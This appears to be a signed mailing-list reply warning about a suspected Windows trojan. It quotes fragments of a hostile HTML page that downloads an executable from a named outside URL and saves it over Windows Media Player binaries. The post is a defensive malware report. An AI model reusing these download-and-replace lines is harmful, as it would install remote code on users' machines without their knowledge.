Re: new WIN virus?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
in response to replies i've received on and off list...
no: i'm not infected (i live in an M$-free home).
no: i didn't submit the [suspected] virus to anyplace other than what i
originally listed.
yes: the HTML file is a trojan. it's purpose is to covertly download the
EXE file, and replace media-players with it. the EXE file is likely up to
no-good, and that's the file that i tested for being a virus. a quick look
at the HTML file reveals that it's intent is evil. i don't have a good way
to check what the EXE file wants to do, but i assume that it's evil.
summary: i'm assuming that if the HTML page wants to covertly do this:
## snip
x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
## snip
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
## snip
then the EXE file is probably something that's not supposed to be a media
player, and should probably be recognized as a virus. the fact that it
isn't recognized as a virus makes me wonder if it's new.
...atom
_______________________________________________
PGP key - http://smasher.suspicious.org/pgp.txt
3EBE 2810 30AE 601D 54B2 4A90 9C28 0BBF 3D7D 41E3
-------------------------------------------------
"Simply stated, there is no doubt that Saddam Hussein now
has weapons of mass destruction."
-- Dick Cheney, 26 August 2002
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)
iD8DBQFAGXdLnCgLvz19QeMRAsWZAJ9o3yW0LiVlRWQ6+HvT9ctwqhPR7ACfWCfz
9ziAQPp5TEfznV6wQ7s+qOY=
=5sDs
-----END PGP SIGNATURE-----